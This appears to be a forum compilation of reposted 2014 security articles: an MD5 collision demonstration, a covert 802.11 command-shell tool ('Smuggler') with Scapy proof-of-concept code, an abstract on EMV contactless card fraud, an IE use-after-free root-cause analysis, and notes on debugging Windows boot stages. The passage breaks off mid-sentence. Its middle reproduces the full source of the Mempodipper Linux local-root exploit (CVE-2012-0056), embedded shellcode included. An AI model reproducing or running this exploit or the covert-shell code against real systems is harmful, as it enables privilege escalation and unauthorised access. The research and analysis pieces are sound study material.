Crypto collision used to hijack Windows Update goes mainstream Final nail in the coffin for the MD5 hash By John Leyden, 5 Nov 2014 The cryptographic hash collision attack used by cyberspies to subvert Microsoft's Windows Update has gone mainstream, revealing that MD5 is hopelessly broken. Security researcher Nat McHugh created two images of different rock 'n' roll icons - James Brown and Barry White - with the same MD5 hash. "The images were just two I lifted from the web ... in fact I could have chosen any image or indeed any arbitrary data and created a collision with it," McHugh reports. The process of computing padding data to produce the collision between two dissimilar images files was carried out on a mainstream cloud computing instance in a matter of hours at a cost estimated by McHugh as being less than a dollar. Brute force attempts to find cryptographic hash collisions – where two dissimilar files give the same hash value – are still impractical for anyone without access to a supercomputer. What McHugh was able to do was to add binary data to the end of two different JPEG images such that the two modified files gave the same hash value. Chosen prefix collisions for MD5 of this type were first successfully demonstrated in 2007. In a chosen prefix collision, the data preceding the specially crafted collision blocks can be completely different, as is the case of the images of the Godfather of Soul and the Walrus of Love. In a blog post, McHugh explains how he was able to work out what binary data to add to the end of the two image files. The chosen prefix collision attack works by repeatedly adding 'near collision' blocks which gradually work to eliminate the differences in the internal MD5 state until they are the same. Before this can be done the files must be of equal length and the bit differences must be of a particular form. This requires a brute force 'birthday' attack which tries random values until two are found that work. t does however have a much lower complexity than a complete brute force attack. Another researcher, Marc Stevens, has created framework for automated finding of differential paths and using them to create chosen pre-fix collisions. https://code.google.com/p/hashclash/ . McHugh chose to run Stevens's HashClash research tool on Linux, using a bash script to automate the repetitive steps needed, on an AWS GPU instance. "I found that I was able to run the algorithm in about 10 hours on an AWS large GPU instance" at a cost of around $0.65 plus tax per crack, according to McHugh. McHugh concludes that his exercise proves MD5 is hopelessly weak, outdated and no longer fit for purpose. MD5 is well and truly broken. Whilst the two images have not shown a break in the pre-image resistance or second pre-image resistance, I cannot think of a single case where the use of a broken cryptographic hash function is an appropriate choice. It was a chosen prefix collision attack similar to this that was used to produce a counterfeit SSL certificate used to sign the Flame malware as Microsoft and pass itself off as a Windows update. Other security experts were inclined to agree with McHugh's conclusion that MD5 is a dead duck. "If you can't even distinguish between Barry White and James Brown, it's time to send MD5 to hashing algorithm heaven," said Martijn Grooten, editor of Virus Bulletin and sometime security researcher, in a Twitter update. A cryptographic hash algorithm such as MD5 converts data into a shortened "message digest" from which it ought to be impossible to recover the original information. This one-way technique is used to generate digital signatures for software downloads, among other functions. Bootnote Flame used a chosen-prefix collision attack against MD5 in order to generate a rogue CA certificate. The sophisticated malware, discovered in 2012 but probably circulating since 2010, was used in a cyber-espionage attack against Middle Eastern countries. Most of the infected systems were located in Iran. The Washington Post claimed in June 2012 that Flame had been jointly developed by the NSA and Israel’s military as part of the same Olympic Games operation that spawned Stuxnet. Put very simply, Flame carried out surveillance and mapped networks while Stuxnet sabotaged the control systems of nuclear processing centrifuges. Sursa: Crypto collision used to hijack Windows Update goes mainstream • The Register

Smuggler - An interactive 802.11 wireless shell without the need for authentication or association I’ve always been fascinated by wireless communications. The ability to launch seemingly invisible packets of information up into the air without even the need to consider aerodynamics itself seems like some kind of magic. In my quest to become a wireless wizard I started looking at the 802.11 wireless protocol to find out a little more about it. I had always noticed when looking at wireless management frames in various packet dumps that a wealth of additional (and somewhat optional) information is sent between stations. Much of this additional information is not all that useful from a security perspective. This additional information that I speak of is known as “Information Elements” (IE), which are contained in 802.11 wireless management frames [1]. The Dot Eleven wiki states, “IEs are a device’s way to transfer descriptive information about itself inside management frames. There are usually several IEs inside each such frame, and each is built of type-length-values mostly defined outside the basic IEEE 802.11 specification.” With regards to IEEE 802.11, these information elements are as follows: (0) SSID, (1) Rates, (2) FHset, (3) DSset, (4) CFset, (5) TIM, (6) IBSSset, (16) challenge, (42) ERPinfo, (46) QoS Capability, (47) ERPinfo, (48) RSNinfo, (50) ESRates, (221) vendor and (68) reserved. I wanted to experiment with these IEs directly. Scapy is a powerful tool that allows such access to this layer via Dot11Elt [2]. Using Scapy I wrote some code to extract the SSID and rates IEs as a proof of concept, the code for this is below. [receiver.py - note: if you copy/paste from this blog the indentations will need to be fixed] #!/usr/bin/python # -- coding: utf-8 -- # wireless information elements receiver POC – Tom Neaves <tneaves@trustwave.com> import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) from scapy.all import * def packets(pkt): if pkt.haslayer(Dot11) : if pkt.type == 0 and pkt.subtype == 8 and pkt.info == "" : # if management frame and beacon and SSID is blank print "AP MAC: %s | SSID: %s | Rates: %s" % (pkt.addr2, pkt.info, (pkt[Dot11Elt:2].info)) sniff(iface="mon0", prn = packets) This would extract the “SSID” and the “rates” IEs from all beacon management frames discovered which had a blank SSID. I then put together some code to act as the sender. Note that I am using an additional wireless card on mon1 to send packets. The receiver is using a different wireless card on mon0 to listen out for our packets. [sender.py - note: if you copy/paste from this blog the indentations will need to be fixed] #!/usr/bin/python # -- coding: utf-8 -- # wireless information elements sender PoC – Tom Neaves <tneaves@trustwave.com> import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) from scapy.all import * conf.iface="mon1" # second wireless card ssid=sys.argv[1] # takes ssid from the command line rates=sys.argv[2] # takes “rates” from the command line def SendRates(rates): frame=RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2=RandMAC(),addr3=RandMAC())/Dot11Beacon(cap="ESS")/ Dot11Elt(ID="SSID",len=len(ssid),info=ssid)/Dot11Elt(ID="Rates",info=rates)/ Dot11Elt(ID="DSset",info="\x03")/Dot11Elt(ID="TIM",info="\x00\x01\x00\x00") sendp(frame, verbose=1) SendRates(rates) # python sender.py “” rateshere The command above will result in a beacon management frame sent into the airwaves with a blank SSID and a “rates” information element of “rateshere”. The receiver will parse the frame and print the rates content out to the screen, in this case “rateshere”. I just utilised an IE in a way not originally intended to pass a message. At this point I did a little digging to determine if I was the first to stumble on this little gem. Turns out yes and no. Chandra, et al. [3] in 2007 explored hacking up the 802.11 protocol in order to broadcast additional information without the need for association. This was in the form of SSID and BSSID concatenation and adding in additional IEs to broadcast “coupons” for advertising purposes. The paper did not, however, discuss modifying using it as a two-way communications channel. Gupta V. and Rohil M.K. [4] in 2013 hacked up the 802.11 protocol to transmit information within the "Length" fields of the IEs. However, again this is only for broadcast purposes. So it seems that I am a little late to the party, however it also appears that I am doing things a little different – I am injecting into the actual IE. Furthermore, the research falls short on being restricted to a one way broadcast. What if I could create a two-way covert communications channel? Furthermore, what could I create without the fuss of association and authentication that is usually required in wireless networks before such communications can begin? What if an attacker could send commands and receive the output on this channel? That would be magic++ and then some. Ladies and gentlemen, I present you Smuggler. I expanded on the proof of concepts already discussed to create a tool called Smuggler. It is a two-way covert communications channel, which consists of an interactive wireless shell without the need for association or authentication, and it works like this: An attacker compromises a machine and starts up a receiver (client.py), much like the proof of concept. The receiver listens to management beacon frames with a blank SSID and, when spotted, extracts the rates IE. The evolution here from the proof of concept (v2.0 if you like…) is that the receiver has the operating system parse the rates IE as a command. The attacker leaves the compromised machine with the receiver running and heads off to grab some lunch. Enter the next act. The attacker comes back the next morning, sitting in the car park with a latte. The attacker uses Smuggler (smuggler.py) to create a management beacon frame (with a blank SSID) and a rates IE with their very own command. Now here comes the clever bit - the receiver parses the command found in the rates IE as already discussed, but wait, it then invokes clientprobe.py to construct management probe requests with the output of the command as the SSID. Smuggler on the attacker’s machine is listening out for these management probe requests and extracts the SSID, hence the output. The information is presented in an attractive looking shell not unlike bash. So, to summarise: Receiver (client.py): If management and beacon frame (AND blank SSID) seen, read rates (attackers_command) IE and send to the OS to parse. Process attackers_command Attacker send commands (smuggler.py): Construct management beacon frame (AND blank SSID) with a custom rates IE. Rates = attackers_command Exfiltration (clientprobe.py): Management frame, probe request, SSID = outputofcommand As a proof of concept the same machine is being used with two wireless cards, however, this would work exactly the same on two computers. The example below shows the attacker issuing the “who” command wirelessly (in the “rates” IE) through the wireless card on mon1 in a management beacon frame. The receiver parses this command and sends the output back wirelessly over another wireless card on mon0 via the SSID of a management frame probe request. What happens “under the hood” within the airwaves is shown below. Another proof of concept for your viewing pleasure. A number of text files which exist on the victim machine: The attacker recreates these commands over the wireless airwaves, all without association or authentication. I am not going to release Smuggler just yet - that is not the objective of this blog post. The objective of this post is that I wanted to share my findings of abusing a protocol in a way not intended and use it for bad things, such as creating this covert two-way communications channel without associating or authenticating. I have also created Anti-Smuggler to demonstrate that it is possible to detect such attacks. However, the proof of concept I have demonstrated is pretty basic in that it does not utilise any form of encryption. You would imagine such convert channels would be reinforced with several layers of security, encryption being just one of them. For the final treat; Anti-Smuggler detecting extraction of credit cards. The regular expressions can be expanded to cover all manner of things – directory listings, extraction of the passwd file, etc. [1] Chapter 4 - 802.11 Management frames - DotEleven [2] scapy: scapy.layers.dot11.Dot11Elt Class Reference - doxygen documentation | Fossies Dox [3] Chandra R., Padhye J., Ravindranath L., Wolman A. “Beacon-Stuffing: Wi-Fi without Associations”, In Proceedings of the Eighth IEEE Workshop Mobile Computing Systems and Applications (Tucson, Arizona, February 26-27, 2007) [4] Gupta G., Rohil M.K., “Bit-Stuffing in 802.11 Beacon Frame: Embedding Non-Standard Custom Information”, International Journal of Computer Applications (0975 – 8887), Volume 63 – No. 2 (February 2013) Posted by Tom Neaves on 03 November 2014 Sursa: Smuggler - An interactive 802.11 wireless shell without the need for authentication or association - SpiderLabs Anterior

Harvesting High Value Foreign Currency Transactions from EMV Contactless Credit Cards without the PIN Martin Emms, Budi Arief, Leo Freitas, Joseph Hannon, Aad van Moorsel School of Computing Science, Newcastle University Newcastle upon Tyne NE1 7RU, United Kingdom {martin.emms, budi.arief, leo.freitas, joseph.hannon, aad.vanmoorsel}@ncl.ac.uk ABSTRACT In this paper we present an attack, which allows fraudulent transactions to be collected from EMV contactless credit and debit cards without the knowledge of the cardholder. The attack exploits a previously unreported vulnerability in EMV protocol, which allows EMV contactless cards to approve unlimited value transactions without the cardholder’s PIN when the transaction is carried out in a foreign currency. For example, we have found that Visa credit cards will approve foreign currency transactions for any amount up to €999,999.99 without the cardholder’s PIN, this side-steps the £20 contactless transaction limit in the UK. This paper outlines our analysis methodology that identified the flaw in the EMV protocol, and presents a scenario in which fraudulent transaction details are transmitted over the Internet to a “rogue merchant” who then uses the transaction data to take money from the victim’s account. In reality, the criminals would choose a value between €100 and €200, which is low enough to be within the victim’s balance and not to raise suspicion, but high enough to make each attack worthwhile. The attack is novel in that it could be operated on a large scale with multiple attackers collecting fraudulent transactions for a central rogue merchant which can be located anywhere in the world where EMV payments are accepted. Download: http://homepages.cs.ncl.ac.uk/budi.arief/home.formal/Papers/CCS2014.pdf

Root Cause Analysis of CVE-2014-1772 – An Internet Explorer Use After Free Vulnerability 11:04 pm (UTC-7) | by Jack Tang (Threats Analyst) We see many kinds of vulnerabilities on a regular basis. These range from user-after-free (UAF) vulnerabilities, to type confusion, to buffer overflows, to cross-site scripting (XSS) attacks. It’s rather interesting to understand the root cause of each of these vulnerability types, so we looked at the root cause of an Internet Explorer vulnerability - CVE-2014-1772. We’d privately disclosed this vulnerability to Microsoft earlier in the year, and it had been fixed as part of the June Patch Tuesday update, as part of MS14-035. While this vulnerability was already patched some time ago, it is still a good example of UAF vulnerabilities in general. The code to trigger this vulnerability is below: Figure 1. HTML code to trigger vulnerability Before debugging, several flags must be set to make the job of analysis easier. Run the command gflags.exe /i iexplore.exe +hpa +ust to to enable the page heap (HPA) and user stack trace (UST) flags. This will make finding memory corruption and tracing heap allocation and frees easier. This file can be found in the Windbg installation folder. You can now run windbg, attach Internet Explorer, and use it to access the HTML file. Examining the JavaScript execution flow, when line 18 of the HTML code is executed, the crash happens: Figure 2. Output of crash We can see the EDI register point to a freed memory space, which leads to an access violation. What is the value of the EDI register? Let us look at the code below. Figure 3. Assembly code The above code tells us that the EDI is from the first argument, which is the CTreePos* type. We can assume the EDI is a pointer of CTreePos. Since the CTreePos object is freed, how can we get where the object is freed? Because the UST flag is set, we can use the !heap -p -a edi command in windbg. Figure 4. Call stack The above figure shows us the call stack of the CTreePos object freed. The call stack has a lot of information. We see the function CMarkup::FreeTreePos; this evidence gives us evidence that the freed object is CTreePos object and that this is a use-after-free issue. Since it is a UAF issue, we want to deeply understand the issue. We need to locate where the CTreePos object is created, where the object is freed, and where the freed object is used again. Figure 4 gives us where the object was freed. To find where is used again, we need to examine the crash point. The call stack is as follows: Figure 5. Call stack How do we find the location where the CTreePos object was created? There are many ways. I prefer to run the sample again, and break the object freed point and use the !heap -p -a xxxx command to trace back to where the object is created. The call stack is as follows: Figure 6. Call stack For UAF problems, I prefer to compare the 3 locations (create, free, use again) to find some clues. Figure 7. Call stacks There are 3 columns in Figure 7. They are call stack trace summaries: from left to right, it is when the object is created, freed, and used again. In the above example, the direction of the stack is from the bottom to the top. There is plenty of useful information here. First, we can find the relationship between the 3 parts. Under the yellow line, CDoc::CutCopyMove is the last identical function in the creation call stack trace and the free call stack trace. This means the execution flow creates the CTreePos object and then frees the object in CDoc::CutCopyMove. Under the red line, the execution flow frees the object and then uses it again (and crashes) in CSpliceTreeEngine::InsertSplice. In the second column, we find the execution flow in the CSpliceTreeEngine::InsertSplice function encounters a failure and call the Fire_onerror function. The function will call the JavaScript object’s onerror event. At the event, the execution will call CMarkupPointer::UnEmbed to free the object. Right away, we have four questions. Why does it trigger an onerror event? Why does it create the CTreePos object? Why does it free the CTreePos object? Why does it use the freed object again? Before answering these questions, I want to summarize some background knowledge about how Internet Explorer’s DOM tree implementation. Because IE is not open source, this information is gathered by reverse engineering, so it may not be 100% accurate. One page has a CMarkup object to represent the page’s skeleton or DOM tree. The CMarkup object contain a pointer to the root CElement object. This is the parent class of many concrete element classes. In Figure 1, the Javascript object e_1 and e_2 are the CObjectElement objects which are inherited from CElement. The CElement object has a pointer to a CTreeNode object. The CTreeNode object also has a pointer to a related CElement object. The CTreeNode’s object has a pair of pointer to CTreePos objects. Why is a CTreePos object needed? This is because IE uses a Splay Tree algorithm to manuiplate the DOM tree. In the Splay Tree, the CTreePos object is the node that is involved in the algorithm. The CMarkupPointer object represents a location in the CMarkup object (DOM tree). So the CMarkupPointer object has a pointer to CTreePos to represent its location. CMarkupPointer has several statuses which are related to UAF issues. Embed status: this means CMarkupPointer created CTreePos, which is added to the Splay Tree. Unembed status: this means CMarkupPointer removes the CTreePos from the Splay Tree and frees it. The following graph describes the interactions involving the splay tree. Figure 8. Splay tree graph Going back to our four questions, we can now attempt to answer them. Why does it trigger an onerror event? From Figure 1?s Javascript code, we can see e_2.onerror sets a handler function. At line 22, e_2.swapNode will trigger DOM tree’s changing; this calls the CObjectElement::CreateObject function. This function checks the object’s CLSID. Because e_2’s CLSID is not set, it triggers the onerror event handler. In the handler, at line 22, the Javascipt code r.insertNode(e_2) will change the DOM tree once again and change CObjectElement::CreateObject as well; because e_2 has no CLSID , it will again trigger the onerror event handler once again. The second time the this handler runs, at r.setEnd(document.all[1],0)” , it frees the CTreePos object. Why does it create the CTreePos object? From Figure 6, the CTreePos object is created in calling the CDomRange::InsertNode function. We can map this function to Figure 1?s line 19: r.insertNode(e_2). The CDomRange::InserNode function will insert elements into the DOM tree. The function is called Doc::CutCopyMove to modify the DOM tree and takes several arguments. The first CMarkupPointer type argument is the source start location in CMarkup (DOM tree) . The second CMarkupPointer type argument is the source end location in CMarkup (DOM Tree). The third CMarkupPointer type argument is the target location in CMarkup (DOM Tree). Doc::CutCopyMove will copy or move the source sub DOM tree to the target location in DOM tree. Because of the use of the Splay Tree algorithm (which uses CTreePos as a node), the function needs to create a CTreePos object and add it to the SplayTree for source CMarkup (DOM tree) and target CMarkup (DOM Tree). Doc::CutCopyMove calls CMarkup::DoEmbedPointers to let the CMarkupPointer change to embed status. Finally, the CTreePos object is created. The UAF CTreePos object is created for the e_1 JavaScript element. Why does it free the CTreePos object? From the call stack trace when the CTreePos object is freed (Figure 4), we can find CDomRange::setEnd. This function can be mapped to line 17 in Figure 1: r.setEnd(e_1,0). That means the CTreePos object is in the implementation of setEnd. The CDomRange::setEnd function wants to replace the original end point with a new end point. This function finally calls CMarkupPointer::MoveToPointer to move to the specific DOM tree location. It will first call CMarkupPointer::UnEmbed to change this CMarkupPointer object to unembed and remove CTreePos from the Splay Tree and free it. The JavaScript code r.setEnd‘s argument is the e_1 element. So the CTreePos object related with the e_1 element is freed. Why does it use the freed object again? In Figure 7, under the red line is the function call for CSpliceTreeEngine::InsertSplice. Column B is CSpliceTreeEngine::InsertSplice+0x13ff. Column C is CSpliceTreeEngine::InsertSplice+0x6EDD4A. Column B is the free call stack trace and Column C is the “used again” crash call stack trace. This means that both “free” and “used again” happen in one function called CSpliceTreeEngine::InsertSplice. We trace the execution flow in this function, and find the following: Figure 9. Assembly code Instruction 636898C4, eax is the address of the UAF CTreePos Objects. The function saves the address to a local variable var_1E4. Then, it proceeds to 6368AA9A. Figure 10. Assembly code At 6368AA9A, it calls a virtual function CObjectElement::Notify. We can find here the call stack trace from Figure 7?s column B. This means when running this call, it encounters an error and calls the onerror event handler . That frees the CTreePos object. However, the CSpliceTreeEngine::InsertSplice function local variable var_1E4 holds a reference to this freed object. It then proceeds to 63D7735B. At 63D7735B , it calls CElment::RecordTextChange ForTsf with var_1E4 as the second argument. When this function is run, if any instruction accesses the contents of the CTreePos object, a crash occurs. Summary In brief, the UAF issue’s root cause is that under the event interaction context, CSpliceTreeEngine::InsertSplice doesn’t handle local variable reference validation properly. DOM is based on event mechanisms. Under complex event interaction contexts, it is a significant challenge to solve UAF issue completely. However, in recent patches Microsoft has introduced memory protection in Internet Explorer, which helps mitigate UAF issues (especially in cases where a UAF object is referenced from the call stack). This highlights one important reason to upgrade to latest versions of software as much as possible: frequently, new techniques that make exploits more difficult are part of newer versions, making the overall security picture better. Trend Micro Deep Security protects users against this particular threat. The following rule, released as part of the regular updates released in June is applicable: 1006036 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-1772) Sursa: Root Cause Analysis of CVE-2014-1772 - An Internet Explorer Use After Free Vulnerability | Security Intelligence Blog | Trend Micro

[h=1]Linux Local Root => 2.6.39 (32-bit & 64-bit) - Mempodipper #2[/h] /*Exploit code is here: http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.cBlog post about it is here: http://blog.zx2c4.com/749 */ /* * Mempodipper * by zx2c4 * * Linux Local Root Exploit * * Rather than put my write up here, per usual, this time I've put it * in a rather lengthy blog post: http://blog.zx2c4.com/749 * * Enjoy. * * - zx2c4 * Jan 21, 2012 * * CVE-2012-0056 */ #define _LARGEFILE64_SOURCE #define _GNU_SOURCE #include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/socket.h> #include <sys/un.h> #include <sys/wait.h> #include <sys/types.h> #include <sys/user.h> #include <sys/ptrace.h> #include <sys/reg.h> #include <fcntl.h> #include <unistd.h> #include <limits.h> char *prog_name; int send_fd(int sock, int fd) { char buf[1]; struct iovec iov; struct msghdr msg; struct cmsghdr *cmsg; int n; char cms[CMSG_SPACE(sizeof(int))]; buf[0] = 0; iov.iov_base = buf; iov.iov_len = 1; memset(&msg, 0, sizeof msg); msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_control = (caddr_t)cms; msg.msg_controllen = CMSG_LEN(sizeof(int)); cmsg = CMSG_FIRSTHDR(&msg); cmsg->cmsg_len = CMSG_LEN(sizeof(int)); cmsg->cmsg_level = SOL_SOCKET; cmsg->cmsg_type = SCM_RIGHTS; memmove(CMSG_DATA(cmsg), &fd, sizeof(int)); if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len) return -1; close(sock); return 0; } int recv_fd(int sock) { int n; int fd; char buf[1]; struct iovec iov; struct msghdr msg; struct cmsghdr *cmsg; char cms[CMSG_SPACE(sizeof(int))]; iov.iov_base = buf; iov.iov_len = 1; memset(&msg, 0, sizeof msg); msg.msg_name = 0; msg.msg_namelen = 0; msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_control = (caddr_t)cms; msg.msg_controllen = sizeof cms; if ((n = recvmsg(sock, &msg, 0)) < 0) return -1; if (n == 0) return -1; cmsg = CMSG_FIRSTHDR(&msg); memmove(&fd, CMSG_DATA(cmsg), sizeof(int)); close(sock); return fd; } unsigned long ptrace_address() { int fd[2]; printf("[+] Creating ptrace pipe.\n"); pipe(fd); fcntl(fd[0], F_SETFL, O_NONBLOCK); printf("[+] Forking ptrace child.\n"); int child = fork(); if (child) { close(fd[1]); char buf; printf("[+] Waiting for ptraced child to give output on syscalls.\n"); for ( { wait(NULL); if (read(fd[0], &buf, 1) > 0) break; ptrace(PTRACE_SYSCALL, child, NULL, NULL); } printf("[+] Error message written. Single stepping to find address.\n"); struct user_regs_struct regs; for ( { ptrace(PTRACE_SINGLESTEP, child, NULL, NULL); wait(NULL); ptrace(PTRACE_GETREGS, child, NULL, &regs); #if defined(__i386__) #define instruction_pointer regs.eip #define upper_bound 0xb0000000 #elif defined(__x86_64__) #define instruction_pointer regs.rip #define upper_bound 0x700000000000 #else #error "That platform is not supported." #endif if (instruction_pointer < upper_bound) { unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL); if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */) return instruction_pointer; } } } else { printf("[+] Ptrace_traceme'ing process.\n"); if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) < 0) { perror("[-] ptrace"); return 0; } close(fd[0]); dup2(fd[1], 2); execl("/bin/su", "su", "not-a-valid-user", NULL); } return 0; } unsigned long objdump_address() { FILE *command = popen("objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r"); if (!command) { perror("[-] popen"); return 0; } char result[32]; fgets(result, 32, command); pclose(command); return strtoul(result, NULL, 16); } unsigned long find_address() { printf("[+] Ptracing su to find next instruction without reading binary.\n"); unsigned long address = ptrace_address(); if (!address) { printf("[-] Ptrace failed.\n"); printf("[+] Reading su binary with objdump to find exit@plt.\n"); address = objdump_address(); if (address == ULONG_MAX || !address) { printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n"); printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", prog_name, prog_name); exit(-1); } } printf("[+] Resolved call address to 0x%lx.\n", address); return address; } int su_padding() { printf("[+] Calculating su padding.\n"); FILE *command = popen("/bin/su this-user-does-not-exist 2>&1", "r"); if (!command) { perror("[-] popen"); exit(1); } char result[256]; fgets(result, 256, command); pclose(command); return strstr(result, "this-user-does-not-exist") - result; } int child(int sock) { char parent_mem[256]; sprintf(parent_mem, "/proc/%d/mem", getppid()); printf("[+] Opening parent mem %s in child.\n", parent_mem); int fd = open(parent_mem, O_RDWR); if (fd < 0) { perror("[-] open"); return 1; } printf("[+] Sending fd %d to parent.\n", fd); send_fd(sock, fd); return 0; } int parent(unsigned long address) { int sockets[2]; printf("[+] Opening socketpair.\n"); if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) { perror("[-] socketpair"); return 1; } if (fork()) { printf("[+] Waiting for transferred fd in parent.\n"); int fd = recv_fd(sockets[1]); printf("[+] Received fd at %d.\n", fd); if (fd < 0) { perror("[-] recv_fd"); return 1; } printf("[+] Assigning fd %d to stderr.\n", fd); dup2(2, 15); dup2(fd, 2); unsigned long offset = address - su_padding(); printf("[+] Seeking to offset 0x%lx.\n", offset); lseek64(fd, offset, SEEK_SET); #if defined(__i386__) // See shellcode-32.s in this package for the source. char shellcode[] = "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3" "\x0f\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68" "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89" "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd" "\x80"; #elif defined(__x86_64__) // See shellcode-64.s in this package for the source. char shellcode[] = "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48" "\x31\xf6\x40\xb7\x0f\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f" "\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7" "\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50" "\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05"; #else #error "That platform is not supported." #endif printf("[+] Executing su with shellcode.\n"); execl("/bin/su", "su", shellcode, NULL); } else { char sock[32]; sprintf(sock, "%d", sockets[0]); printf("[+] Executing child from child fork.\n"); execl("/proc/self/exe", prog_name, "-c", sock, NULL); } return 0; } int main(int argc, char **argv) { prog_name = argv[0]; if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c') return child(atoi(argv[2])); printf("===============================\n"); printf("= Mempodipper =\n"); printf("= by zx2c4 =\n"); printf("= Jan 21, 2012 =\n"); printf("===============================\n\n"); if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o') return parent(strtoul(argv[2], NULL, 16)); else return parent(find_address()); } Sursa: http://www.exploit-db.com/exploits/35161/

Incepe cu asta: Welcome to Linux From Scratch!

Probabil pentru ca uploadezi trojeni.

Cardurile bancare contactless de la VISA, susceptibile la atacuri din cauza unei bre?e de implementare Dorian Prodan - 4 nov 2014 Toate obiectele din jurul nostru vor s? devin? ceva mai „inteligente” ?i s? se ne simplifice via?a, îns? progresul tehnologic ne ofer? uneori ?i surprize nepl?cute. Cel mai recent exemplu afecteaz? cardurile bancare VISA, un grup de cercet?tori din cadrul universit??ii Newcastle din Marea Britanie descoperind o problem? software a sistemului VISA care faciliteaz? furtul banilor de pe cardurile care includ ?i un cip RFID pentru plata contacteless. Implementat ?i la noi în ?ar?, sistemul de plat? payWave de la VISA folose?te un cip RFID cu ajutorul c?ruia posesorul cardului poate valida o tranzac?ie f?r? a mai folosi codul de protec?ie PIN ?i f?r? a mai introduce cardul într-un POS. Deoarece sistemul este gândit pentru pl??ile m?runte f?cute în mod curent ?i nu folose?te autentific?ri manuale suplimentare, VISA ?i b?ncile emitente au stabilit ?i o limit? pentru sumele care pot fi transferate în cadrul unei opera?iuni, îns? acest sistem se pare c? nu func?ioneaz? tot atât de bine pe cât ?i-ar fi dorit institu?iile bancare. Conform lucr?rii publicate de cercet?torii britanici, sistemul VISA poate fi p?c?lit s? valideze tranzac?ii cu o valoare care dep??e?te limita impus? pentru plata contactless atunci când moneda folosit? este alta decât cea curent? folosit? de banca emitent?. Dac? bariera în moneda implicit? func?ioneaz?, utilizarea unei monede str?ine ?i conversia valutar? f?cut? de banc? scurtcircuiteaz? sistemul de protec?ie VISA ?i permite validarea contactless a unor tranzac?ii cu o valoare de cel mult 999.999 de dolari. Cercet?torii afirm? c? aceast? bre?? poate fi speculat? de cei care vor folosi o metod? ingenioas? prin care datele de pe un card bancar contactless pot fi accesate f?r? ?tirea utilizatorului. Acum doi ani, cercet?torii viaForensic au ar?tat c? pe un telefon Android echipat cu cip NFC pot fi instalate aplica?ii speciale care imit? un POS ?i determin? cardul bancar s? încerce s? se autentifice ?i s? semneze o tranzac?ie. Cercet?torii din cadrul universit??ii Newcastle afirm? c?, folosind aceast? metod?, persoanele r?u inten?ionate pot preg?ti un astfel de telefon, pot ini?ia o tranzac?ie ?i pot încerca s? treac? pe lâng? persoanele str?ine în locuri aglomerate în speran?a c? unul dintre cardurile din buzunarele acestora vor trece suficient de aproape de ei pentru a putea valida tranzac?ia. VISA Europe afirm? c? metoda descoperit? de cercet?torii britanici nu reprezint? o problem? real?. Compania afirm? c? efectuarea unor astfel de pl??i frauduloase este extrem de dificil? dincolo de u?ile laboratorului, în lumea real?. Compania nu a oferit înc? o declara?ie referitoare la problema care permite ocolirea limitelor de sum? stabilite pentru tranzac?iile contactless. Sursa: Cardurile bancare contactless de la VISA, susceptibile la atacuri din cauza unei bre?e de implementare

_|_ Pana pe vreo 20 sa avem si timp sa le imprimam.

[h=3]Debugging Early Boot Stages of Windows[/h] Recently, I have spent some time for reverse engineering bootkit. It has been a fun exercise, but I had to struggle for setting up the environment before that as I could not find a page explains these steps. So as a note for me, I wrote down how to build a bootkit debugging environment as well as how to configure Windows in order to attach a debugger at some early uncommon boot stages. [h=3][/h] [h=3]Boot Processes[/h] Here are boot processes of BIOS based Windows XP and Windows 7 systems. I will discuss each stage except for BIOS (POST) and Ntoskrnl.exe. [h=4][/h] [h=4][/h] [h=4]Boot Process (XP)[/h] BIOS (POST) -> MBR -> VBR -> Ntldr (Real-Mode) -> Ntldr (Protected-Mode) -> Ntoskrnl.exe [h=4]Boot Process (Windows 7)[/h] BIOS (POST) -> MBR -> VBR -> Bootmgr (Real-Mode) -> Bootmgr (Protected-Mode) -> Winload.exe -> Ntoskrnl.exe [h=3]Debugging[/h] [h=4]MBR, VBR, Ntldr (Real-Mode) and Bootmgr (Real-Mode)[/h] We need Bochs as no break points are provided on the course of these steps. Installing OS on Bochs is not hard unless you try to find the perfect configurations such as smooth mouse movement, correct clock speed and working NICs. Since we are not going to use this OS anything but boot debugging, I do not encourage you to spend time for it. What you need to do to install OS are roughly as follows: Create a flat hard disk image with 10GB size using bximage.exe. Configure bochs.bxrc with boches.exe to use the created hard disk image and an OS installer ISO image. Start to install OS. Installation may take a few hours. I also strongly recommend you to use the latest version of Bochs to avoid unnecessary troubles. Even if your old IDA Pro does not work with the latest one like my case, you can switch to old one after you completed the installation process for debugging. Here are my bochsrc files for version 2.6.6 and 2.4.6 with nearly identical configurations. You may use them as samples when you are not familiar with Bochs. Once you have finished installing the OS (no need for applying Windows updates), you can debug MBR and VBR with either running it with bochsdbg.exe or corroborating with IDA Pro. If you hope to take the former way, you can add the 